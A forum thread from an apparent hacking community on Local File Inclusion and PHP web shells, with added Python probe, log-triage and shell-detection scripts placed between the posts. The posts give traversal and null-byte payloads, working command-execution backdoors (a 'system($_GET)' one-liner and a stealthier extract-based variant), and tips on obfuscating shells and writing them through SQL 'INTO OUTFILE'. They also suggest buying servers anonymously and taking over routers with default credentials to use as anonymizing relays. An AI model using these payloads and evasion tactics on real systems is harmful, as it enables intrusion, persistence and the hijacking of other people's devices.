[Video] Basic LFI and uploading PHP Shell
#1
LFI Introduction

OWASP Wrote: Summary
The File Inclusion vulnerability allows an attacker to include a file, usually by exploiting "dynamic file inclusion" mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.

This can lead to something as simple as outputting the contents of the file, but depending on the severity, it can also lead to:
  • Code execution on the web server
  • Code execution on the client side, such as JavaScript, which can lead to other attacks such as cross-site scripting (XSS)
  • Denial of Service (DoS)
  • Sensitive Information Disclosure
Local File Inclusion (also known as LFI) is the process of including files that are already locally present on the server, by exploiting vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives as input the path to the file that has to be included and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected. Although most examples point to vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such as JSP, ASP and others.


Video Example


(Tools used: Firefox with the Hackbar addon. /etc/passwd is read through directory traversal, and further exploitation is done through the php://input wrapper, which makes the vulnerable include() execute the PHP code sent in the POST body; this wrapper only works for include() when allow_url_include is enabled. There are other methods as well.)


LFI Example


OWASP Wrote: Since LFI occurs when paths passed to "include" statements are not properly sanitized, in a black-box testing approach we should look for scripts which take filenames as parameters.

Consider the following example:
http://vulnerable_host/preview.php?file=example.html


This looks like a perfect place to try for LFI. If the attacker is lucky and, instead of selecting the appropriate page from an array by its name, the script directly includes the input parameter, it is possible to include arbitrary files on the server.

A typical proof of concept would be to load the passwd file:
http://vulnerable_host/preview.php?file=../../../../etc/passwd


If the above-mentioned conditions are met, an attacker would see something like the following:
Code:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
alex:x:500:500:alex:/home/alex:/bin/bash
margo:x:501:501::/home/margo:/bin/bash
...

Very often, even when such a vulnerability exists, its exploitation is a bit more complex. Consider the following piece of code:
Code:
<?php // deliberately vulnerable: unvalidated $_GET['file'] with a fixed ".php" suffix appended
include("include/" . $_GET['file'] . ".php"); ?>

In this case, simple substitution with an arbitrary filename would not work, as the suffix '.php' is appended. In order to bypass it, a technique with null-byte terminators is used. Since %00 effectively represents the end of the string, any characters after this special byte will be ignored. Thus, the following request will also return the attacker a list of basic user attributes:
http://vulnerable_host/preview.php?file=../../../../etc/passwd%00


Further reading / references:
  • OWASP
  • Wikipedia
  • Hapedia
  • Daisuke Dan
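To make the traversal and null-byte discussion above concrete, here is an added example (not code from the original post or from OWASP): a small Python probe harness that generates candidate `file=` values, percent-encodes them, and recognises `/etc/passwd` content in a response. It runs offline against a constructed stand-in for the vulnerable `preview.php`, which models the `include("include/" . $_GET['file'] . ".php")` pattern under a hypothetical document root of `/var/www/html`. The PHP-version switch in the stand-in reflects a caveat the quoted text leaves out: the `%00` truncation bypass only works on PHP older than 5.3.4, because later versions refuse paths that contain a null byte.

```python
"""LFI probe harness: added example, not code from the original post or OWASP.

Assumptions (hypothetical): the vulnerable script is preview.php?file=... and
builds its path as include("include/" . $_GET['file'] . ".php") below a
document root of /var/www/html.  fake_target() is a constructed stand-in for
that script so the harness runs offline; for an authorised test you would
replace it with a function that sends the HTTP request and returns the body.
"""
import posixpath
import re
from urllib.parse import quote

# One /etc/passwd record: name:pw:uid:gid:gecos:home:shell
PASSWD_LINE = re.compile(
    r"^[a-z_][a-z0-9_-]*:[^:]*:\d+:\d+:[^:]*:[^:]*:[^:\n]*$", re.M)

# Constructed file system contents for the fake target.
FAKE_FS = {
    "/etc/passwd": (
        "root:x:0:0:root:/root:/bin/bash\n"
        "bin:x:1:1:bin:/bin:/sbin/nologin\n"
        "alex:x:500:500:alex:/home/alex:/bin/bash\n"
    ),
    "/var/www/html/include/example.html.php": "<h1>example</h1>\n",
}
INCLUDE_DIR = "/var/www/html/include"   # the script's include/ directory


def traversal_payloads(target="etc/passwd", max_depth=6, null_byte=True):
    """Candidate values for the file parameter, shallowest first.

    The variant ending in "\\x00" relies on PHP truncating the path at the
    null byte, which only holds for PHP < 5.3.4.
    """
    payloads = []
    for depth in range(1, max_depth + 1):
        base = "../" * depth + target
        payloads.append(base)
        if null_byte:
            payloads.append(base + "\x00")
    return payloads


def encode_param(value):
    """Percent-encode for the query string; "\\x00" becomes %00."""
    return quote(value, safe="/")


def looks_like_passwd(body, min_lines=2):
    """Heuristic: at least min_lines well-formed passwd records in the body."""
    return len(PASSWD_LINE.findall(body)) >= min_lines


def fake_target(file_param, appends_php=True, truncates_at_null=True):
    """Model of the vulnerable include (constructed; not a real server).

    appends_php       -> the script does include($file . ".php")
    truncates_at_null -> PHP < 5.3.4 behaviour (the null-byte bypass works)
    """
    path = file_param + (".php" if appends_php else "")
    if "\x00" in path:
        if not truncates_at_null:
            # Modern PHP refuses paths containing a null byte.
            return "Warning: include(): Filename contains a null byte\n"
        path = path.split("\x00", 1)[0]
    resolved = posixpath.normpath(posixpath.join(INCLUDE_DIR, path))
    if resolved in FAKE_FS:
        return FAKE_FS[resolved]
    return "Warning: include(%s): failed to open stream\n" % resolved


def probe(send, payloads):
    """Return (payload, body) for the first payload whose response looks like
    /etc/passwd, or None.  `send` maps a parameter value to a response body."""
    for payload in payloads:
        body = send(payload)
        if looks_like_passwd(body):
            return payload, body
    return None


if __name__ == "__main__":
    for label, send in [
        ("no suffix appended", lambda p: fake_target(p, appends_php=False)),
        ("suffix + old PHP", lambda p: fake_target(p, True, True)),
        ("suffix + modern PHP", lambda p: fake_target(p, True, False)),
    ]:
        hit = probe(send, traversal_payloads())
        print(label, "->", "?file=" + encode_param(hit[0]) if hit else "no LFI found")
```

Running it shows the three outcomes: without the `.php` suffix the plain traversal at depth 4 succeeds, with the suffix only the null-byte variant succeeds and only on the old PHP model, and on the modern PHP model no payload in this list works, which is the cue to move on to other techniques such as the php://input wrapper mentioned in the video notes.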
#2
Interesting, so besides trashing the site what could someone really do with this? Proxying requests would be useful (and here it's not even necessary to file upload). If say file upload was exposed and the url fetching wasn't that would be a nice php file to have.

Privilege escalation or SSH access would obviously be nice, but neither is trivial and may not work.

Also these are both interesting, just a way to create a more consistent access shell.
http://pentestmonkey.net/cheat-sheet/she...heat-sheet
http://pentestmonkey.net/tools/web-shell...sock-shell
#3
(01-03-2017, 01:48 AM)StickFigure Wrote: Interesting, so besides trashing the site what could someone really do with this? Proxying requests would be useful (and here it's not even necessary to file upload). If say file upload was exposed and the url fetching wasn't that would be a nice php file to have.

Privilege escalation or SSH access would obviously be nice, but neither is trivial and may not work.

Also these are both interesting, just a way to create a more consistent access shell.
http://pentestmonkey.net/cheat-sheet/she...heat-sheet
http://pentestmonkey.net/tools/web-shell...sock-shell

Well, privilege escalation and SSH access was just what I was thinking. Just set up a reverse shell, connect with bash or something and start looking for kernel exploits and such.

Good cheatsheet: http://pentestmonkey.net/cheat-sheet/she...heat-sheet
Some basics on priv-escalation: https://greysec.net/showthread.php?tid=1355

A friend of mine did just that through an LFI vulnerability, gained a reverse shell among many things. Got the database credentials from the source code, root via exploit. Well the possibilities are many, just think outside the box sometimes. The company was also reasonably big, for which reason I will not mention it here.

Edit:
More specific details on PHP Reverse shell. http://pentestmonkey.net/tools/web-shell...erse-shell

Edit 2:
Sorry, I'm silly. I did read your post, but didn't realize you were referring to the exact same thing, with those links. Yes indeed, a reverse shell is very useful!
#4
(01-03-2017, 03:26 PM)Insider Wrote: A friend of mine did just that through an LFI vulnerability, gained a reverse shell among many things. Got the database credentials from the source code, root via exploit. Well the possibilities are many, just think outside the box sometimes. The company was also reasonably big, for which reason I will not mention it here.

Edit:
More specific details on PHP Reverse shell. http://pentestmonkey.net/tools/web-shell...erse-shell

Is there a reason reverse shell would be favored to a "regular" ole shell? (Like the php-find-sock one). And does such a thing have a common name? Unfortunately "php shell exploit" variations turn up either reverse shell or just literal shell exploits.

It seems like it would be less desired because you have to burn an IP address. I guess it's less complex and less likely to hit a firewall.

Now that I think about it, couldn't any sql injection with write access exploit this? You don't really need to write a new file you could borrow an existing one.
#5
(01-04-2017, 01:30 AM)StickFigure Wrote: Is there a reason reverse shell would be favored to a "regular" ole shell? (Like the php-find-sock one). And does such a thing have a common name? Unfortunately "php shell exploit" variations turn up either reverse shell or just literal shell exploits.

It seems like it would be less desired because you have to burn an IP address. I guess it's less complex and less likely to hit a firewall.

Now that I think about it, couldn't any sql injection with write access exploit this? You don't really need to write a new file you could borrow an existing one.

Well with a reverse shell you will have a more interactive interface to deal with and it is simply easier to escalate the hack with stuff like priv-esc, maintaining access, downloading exploits and stuff.

It would probably be possible through a simple php rce shell, like shell.php?cmd=ls (commands) but all the same it would be pretty ineffective in my opinion to work with this in the web browser, not to mention that it will all be very visible in the web server logs and WAF.

If you have a server or domain this would be pretty feasible, yeah. Just need to make sure you buy the server anonymously and pay with bitcoins and all those things.

I'm not sure if you can do this through SQL injection. It depends on the situation, if mysql runs as root etc. But if you can create php shells and such with the sql injection, I'm sure you could also use it to add a reverse shell.
Related: https://greysec.net/showthread.php?tid=211

Edit: Yeah regarding IPs and servers I think you could probably use hacked contraband machines for this, like staging servers. Maybe scan ip ranges and grab banners for routers with ssh access and try using default credentials, a method that works a lot if you know which routers to look for. I've yet to try this with reverse shells, but they're certainly great for getting free anonymizing ssh tunnels with residential IPs.
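Insider's point that a `shell.php?cmd=` style backdoor is very visible in the web server logs is worth turning around for the defender. The following is an added example, not code from the thread: a Python triage script that parses combined-format access log lines and flags the request patterns discussed in this thread (directory traversal, null bytes, PHP stream wrappers such as php://input, requests for /etc/passwd, a parameter whose value names an exec function, and `cmd=` style parameters). It also undoes double percent-encoding, which attackers use to slip traversal sequences past naive filters. The log lines are constructed for the example; the hosts, paths and timestamps are hypothetical.

```python
"""Access-log triage for LFI and web-shell traffic: added example, not from the thread.

The log lines in SAMPLE_LOG are constructed for this example (Apache/nginx
"combined" format with hypothetical hosts and times), not real server logs.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+')

# Indicators checked against every (decoded) query-string value.
VALUE_INDICATORS = [
    ("traversal", re.compile(r"(^|[/\\])\.\.([/\\]|$)")),
    ("null_byte", re.compile("\x00")),
    ("php_wrapper", re.compile(r"^(php|data|expect|phar|zip)://", re.I)),
    ("sensitive_file", re.compile(r"/etc/(passwd|shadow)|/proc/self/environ", re.I)),
    ("exec_function", re.compile(r"^(system|exec|passthru|shell_exec|popen)$", re.I)),
]
# Parameter names that one-liner shells commonly use (shell.php?cmd=ls).
SHELL_PARAMS = {"cmd", "exec", "command"}


def decode_deep(value, rounds=2):
    """Undo up to `rounds` extra layers of percent-encoding; attackers
    double-encode (%252e%252e%252f) to get past filters that decode once."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def analyse_line(line):
    """Return a finding dict for a suspicious request line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group("target")
    url = urlsplit(target)
    hits = set()
    # parse_qsl already decodes one layer; decode_deep handles the rest.
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        value = decode_deep(value)
        if key.lower() in SHELL_PARAMS:
            hits.add("shell_param")
        for name, rx in VALUE_INDICATORS:
            if rx.search(value):
                hits.add(name)
    # Traversal can also sit in the path itself, outside any parameter.
    if VALUE_INDICATORS[0][1].search(decode_deep(url.path)):
        hits.add("traversal")
    if not hits:
        return None
    return {"ip": m.group("ip"), "method": m.group("method"), "target": target,
            "status": int(m.group("status")), "indicators": sorted(hits)}


def scan(lines):
    """Findings for every suspicious line, in log order."""
    return [f for f in (analyse_line(l) for l in lines) if f]


# Constructed sample; the second through sixth lines mirror the thread's examples.
SAMPLE_LOG = """\
10.0.0.5 - - [03/Jan/2017:01:48:10 +0000] "GET /preview.php?file=example.html HTTP/1.1" 200 512
10.0.0.9 - - [03/Jan/2017:01:49:02 +0000] "GET /preview.php?file=../../../../etc/passwd%00 HTTP/1.1" 200 2048
10.0.0.9 - - [03/Jan/2017:01:50:11 +0000] "POST /preview.php?file=php://input HTTP/1.1" 200 88
10.0.0.9 - - [03/Jan/2017:01:51:30 +0000] "GET /config.php?ctime=system&atime=ls HTTP/1.1" 200 301
10.0.0.9 - - [03/Jan/2017:01:52:01 +0000] "GET /preview.php?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 2048
10.0.0.9 - - [03/Jan/2017:01:53:45 +0000] "GET /images/shell.php?cmd=id HTTP/1.1" 200 64
""".splitlines()

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["status"], ",".join(f["indicators"]), f["target"])
```

The status code is kept in each finding on purpose: a traversal attempt answered with 200 and a body size matching a passwd file deserves a different priority from one answered with 404.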
#6
(01-04-2017, 01:40 AM)Insider Wrote: Well with a reverse shell you will have a more interactive interface to deal with and it is simply easier to escalate the hack with stuff like priv-esc, maintaining access, downloading exploits and stuff.

It would probably be possible through a simple php rce shell, like shell.php?cmd=ls (commands) but all the same it would be pretty ineffective in my opinion to work with this in the web browser, not to mention that it will all be very visible in the web server logs and WAF.

If you have a server or domain this would be pretty feasible, yeah. Just need to make sure you buy the server anonymously and pay with bitcoins and all those things.

I'm not sure if you can do this through SQL injection. It depends on the situation, if mysql runs as root etc. But if you can create php shells and such with the sql injection, I'm sure you could also use it to add a reverse shell.
Related: https://greysec.net/showthread.php?tid=211

Edit: Yeah regarding IPs and servers I think you could probably use hacked contraband machines for this, like staging servers. Maybe scan ip ranges and grab banners for routers with ssh access and try using default credentials, a method that works a lot if you know which routers to look for. I've yet to try this with reverse shells, but they're certainly great for getting free anonymizing ssh tunnels with residential IPs.

Ah "rce" was the word I was looking for. Thanks for the info Insider, good stuff.

About sql injection (ok this hasn't been totally thought out), say you have a shell.php file, ignoring syntax and escaping difficulties, it should be possible to use the contents of shell.php as a payload, no?
Just to think in the most basic terms, MySQL file r/w is actually pretty nifty too, but as you said requires root.

Edit: Oh nvm, I'm thinking like we could write out a php function and have it be interpreted, obviously php doesn't work like that.
#7
(01-04-2017, 02:19 AM)StickFigure Wrote:
Ah "rce" was the word I was looking for. Thanks for the info Insider, good stuff.

About sql injection (ok this hasn't been totally thought out), say you have a shell.php file, ignoring syntax and escaping difficulties, it should be possible to use the contents of shell.php as a payload, no?
Just to think in the most basic terms, MySQL file r/w is actually pretty nifty too, but as you said requires root.

Well sure you can use the contents of shell.php as the payload but that sounds pretty static leaving you with little options if you want to try new stuff. Which is why I usually just prefer simple one-liners that lets me enter commands through GET requests and stuff.

Code:
<?php system($_GET['cmd']); // runs whatever the cmd parameter holds, output goes back in the response ?>

URL: shell.php?cmd=ls

Of course you should probably obfuscate that (with base64 + eval maybe), or maybe even split up the shell into several smaller parts and use include to make them into one complete file. There's many interesting tricks.

Screw all these complete and big featured PHP shells like c99. Most of the filenames are blocked by WAF and almost all of them contain a backdoor made by the developer, at least in my own experience.

Another more stealthy version of those types of backdoor (Not mine, I found this on another forum):
Code:
<?php
@extract($_REQUEST);   // every request parameter becomes a PHP variable
@die($ctime($atime));  // $ctime names the function to call, $atime is its argument
?>
URL: config.php?ctime=system&atime=ls
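The two one-liners above are easy to miss in a code review or an upload-directory sweep because neither contains an obvious command string. As an added example (not code from the thread), here is a Python file-triage script that looks for exactly those shapes in PHP source: an exec function fed straight from a superglobal, `extract()` over request data, a variable-named function called with a variable argument, and `eval()` over a decoded payload, whose base64 literal it also unpacks and rescans. The sample files are constructed for the example and the paths are hypothetical.

```python
"""Static triage of PHP files for one-liner web shells: added example, not from the thread.

SAMPLES is constructed for this example: the two one-liners quoted in the post,
a base64-packed variant, and a benign file.  The paths are hypothetical.
"""
import base64
import binascii
import re

SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)"
EXEC_FUNCS = r"(?:system|exec|passthru|shell_exec|popen|proc_open|eval|assert)"

RULES = [
    # system($_GET['cmd']): an exec function fed straight from request input
    ("exec_from_request",
     re.compile(r"\b" + EXEC_FUNCS + r"\s*\(\s*" + SUPERGLOBAL, re.I)),
    # extract($_REQUEST): every request parameter becomes a local variable
    ("extract_request",
     re.compile(r"\bextract\s*\(\s*" + SUPERGLOBAL, re.I)),
    # $ctime($atime): a function named by a variable, called with a variable
    ("variable_function_call",
     re.compile(r"\$[A-Za-z_]\w*\s*\(\s*\$[A-Za-z_]\w*")),
    # eval(base64_decode(...)) / eval(gzinflate(...)): packed payload
    ("eval_decoded",
     re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
]

# String literal handed to base64_decode(), so the payload can be unpacked and rescanned.
B64_LITERAL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]", re.I)


def scan_php(source, depth=1):
    """Names of the rules that fire on one PHP source string.

    Base64 literals passed to base64_decode() are decoded and scanned again
    (up to `depth` levels); those hits are prefixed with "decoded:".
    """
    hits = [name for name, rx in RULES if rx.search(source)]
    if depth > 0:
        for literal in B64_LITERAL.findall(source):
            try:
                inner = base64.b64decode(literal, validate=True).decode("utf-8", "replace")
            except (binascii.Error, ValueError):
                continue
            hits += ["decoded:" + h for h in scan_php(inner, depth - 1)]
    return hits


def triage(files):
    """files: {path: source}. Returns {path: [rule, ...]} for files with hits."""
    findings = {}
    for path, source in files.items():
        hits = scan_php(source)
        if hits:
            findings[path] = hits
    return findings


# Constructed samples; the base64 string decodes to system($_GET['c']);
SAMPLES = {
    "uploads/shell.php": "<?php system($_GET['cmd']); ?>",
    "includes/config.php": "<?php\n@extract($_REQUEST);\n@die($ctime($atime));\n",
    "cache/x.php": "<?php eval(base64_decode('c3lzdGVtKCRfR0VUWydjJ10pOw==')); ?>",
    "lib/db.php": "<?php\n$dsn = getenv('DB_DSN');\n$pdo = new PDO($dsn);\n",
}

if __name__ == "__main__":
    for path, hits in triage(SAMPLES).items():
        print(path, "->", ", ".join(hits))
```

The variable-function rule is the one that catches the `config.php` backdoor: there is no dangerous function name anywhere in the file, only the shape `$a($b)`, so signature lists built from function names alone will miss it.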
#8
(01-04-2017, 02:19 AM)StickFigure Wrote:
Ah "rce" was the word I was looking for. Thanks for the info Insider, good stuff.

About sql injection (ok this hasn't been totally thought out), say you have a shell.php file, ignoring syntax and escaping difficulties, it should be possible to use the contents of shell.php as a payload, no?
Just to think in the most basic terms, MySQL file r/w is actually pretty nifty too, but as you said requires root.

Edit: Oh nvm, I'm thinking like we could write out a php function and have it be interpreted, obviously php doesn't work like that.

Well if the user in whose context the database process is running has write access you can write out a shell with the `limit into outfile`/`lines terminated by` method.

The MySQL query proper would look a little like this.

Code:
SELECT * FROM user_credentials WHERE `username` = 'Vector'

SELECT * FROM user_credentials WHERE `username` = 'Vector' LIMIT 0,1 INTO OUTFILE '/var/www/tmpulhxi.php' LINES TERMINATED BY 0x36 ... AND 'PipI'='PipI'

First you make the request then you append the `limit into outfile` declaration.

At least that is how SQLmap does it when you provide the --os-shell flag.